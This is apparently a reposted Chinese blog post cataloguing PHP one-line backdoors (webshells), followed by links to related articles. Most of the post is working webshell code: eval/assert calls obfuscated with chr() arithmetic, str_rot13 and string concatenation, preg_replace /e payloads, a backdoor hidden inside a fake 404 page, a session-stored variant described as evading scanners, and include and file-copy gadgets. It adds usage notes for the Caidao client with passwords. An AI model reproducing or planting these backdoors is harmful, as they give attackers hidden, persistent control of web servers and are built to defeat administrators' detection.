那些强悍的PHP一句话后门

简介:

强悍的PHP一句话后门


常用一:

<?php $a=range(1,200);$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-1+1]).chr($a[100-1+1]).chr($a[113-1+1]).chr($a[115-1+1]); 


$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]); 

?>

所以连起来就是

assert(${_POST}[4]);

密码就是4




常用二:

<?php

($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');

?>


使用上跟原来的一句话没有区别,可用常用的客户端连接密码b4dboy。


str_rot13(‘riny’)即编码后的eval,完全避开了关键字,又不失效果。




这类后门让网站、服务器管理员很是头疼经常要换着方法进行各种检测而很多新出现的编写技术用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。


利用404页面隐藏PHP小马

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<html><head>

<title>404 Not Found</title>

</head><body>

<h1>Not Found</h1>

<p>The requested URL was not found on this server.</p>

</body></html>

<?php

@preg_replace("/[pageerror]/e",$_POST['error'],"saft");

header('HTTP/1.1 404 Not Found');

?>

404页面是网站常用的文件一般建议好后很少有人会去对它进行检查修改这时我们可以利用这一点进行隐藏后门。


无特征隐藏PHP一句话


<?php

session_start();

$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);

$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');


将$_POST['code']的内容赋值给$_SESSION['theCode']然后执行$_SESSION['theCode']亮点是没有特征码。用扫描工具来检查代码的话是不会报警的达到目的了。




三个变形的一句话PHP木马


第一个

<?php ($_=@$_GET[2]).@$_($_POST[1])?>

在菜刀里写http://site/1.php?2=assert密码是1


第二个

<?php

$_="";

$_[+""]='';

$_="$_"."";

$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");

?>

<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>

在菜刀里写http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass。如果你用菜刀的附加数据的话更隐蔽或者用其它注射工具也可以因为是post提交的。


第三个

($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');

str_rot13(‘riny’)即编码后的eval完全避开了关键字又不失效果让人吐血


最后列几个高级的PHP一句话木马后门


1、

$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$hh("/[discuz]/e",$_POST['h'],"Access");

//菜刀一句话

2、

$filename=$_GET['xbid'];

include ($filename);

//危险的include函数直接编译任何文件为php格式运行

3、

$reg="c"."o"."p"."y";

$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);

//重命名任何文件

4、

$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$gzid("/[discuz]/e",$_POST['h'],"Access");

//菜刀一句话

5、

include ($uid);

//危险的include函数直接编译任何文件为php格式运行POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif

//gif插一句话

6、

典型一句话

程序后门代码

<?php eval_r($_POST[sb])?>

程序代码

<?php @eval_r($_POST[sb])?>

//容错代码

程序代码

<?php assert($_POST[sb]);?>

//使用lanker一句话客户端的专家模式执行相关的php语句

程序代码

<?$_POST['sa']($_POST['sb']);?>

程序代码

<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>

程序代码

<?php

@preg_replace("/[email]/e",$_POST['h'],"error");

?>

//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入

程序代码

<O>h=@eval_r($_POST1);</O>

程序代码

<script language="php">@eval_r($_POST[sb])</script>

//绕过<?限制的一句话


综上这些PHP一句话后门可谓五脏俱全一不小心您肯定中招了。


本文转自 gutaotao1989 51CTO博客,原文链接:http://blog.51cto.com/taoyouth/1742681


相关文章
|
Linux PHP
记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门)
记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门)
125 0
记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门)
|
存储 安全 关系型数据库
网站安全渗透测试公司对php代码后门分析
很多想做渗透测试的朋友都想了解关于PHP后门漏洞的安全测试重点方法,以及该如何预防被中php后门,本节由我们的安全高级渗透工程师进行全面的讲解,来让大家更好的理解和了解php代码的安全检测,让网站得到最大化的安全保障,安全保障了,网站才能更长远的运行下去。
1333 0
|
Web App开发 安全 PHP
那些强悍的PHP一句话后门
强悍的PHP一句话后门 这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马: 404 Not Found Not Found The requested URL was not found on this server. 404页面是网站常用的文件,一般建议好后很少有人会去对它进行检查修改,这时我们可以利用这一点进行隐藏后门。
2146 0
|
PHP 安全
PHP后门的一些用法
今天我们说一些最常见的PHP留后门的一些用法 首先,写一个最简单的后门,也可以叫做木马。
1239 0
shellstack,基于php的后门管理工具
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396442 ...
986 0
|
PHP
编写基于PHP扩展库的后门
http://drops.wooyun.org/tips/3003 https://github.
713 0
|
安全 PHP 数据安全/隐私保护
|
1月前
|
前端开发 关系型数据库 MySQL
PHP与MySQL动态网站开发实战指南####
【10月更文挑战第21天】 本文将深入浅出地探讨如何使用PHP与MySQL构建一个动态网站,从环境搭建到项目部署,全程实战演示。无论你是编程新手还是希望巩固Web开发技能的老手,都能在这篇文章中找到实用的技巧和启发。我们将一起探索如何通过PHP处理用户请求,利用MySQL存储数据,并最终呈现动态内容给用户,打造属于自己的在线平台。 ####
49 0
|
28天前
|
存储 关系型数据库 MySQL
PHP与MySQL动态网站开发:从基础到实践####
本文将深入探讨PHP与MySQL的结合使用,展示如何构建一个动态网站。通过一系列实例和代码片段,我们将逐步了解数据库连接、数据操作、用户输入处理及安全防护等关键技术点。无论您是初学者还是有经验的开发者,都能从中获益匪浅。 ####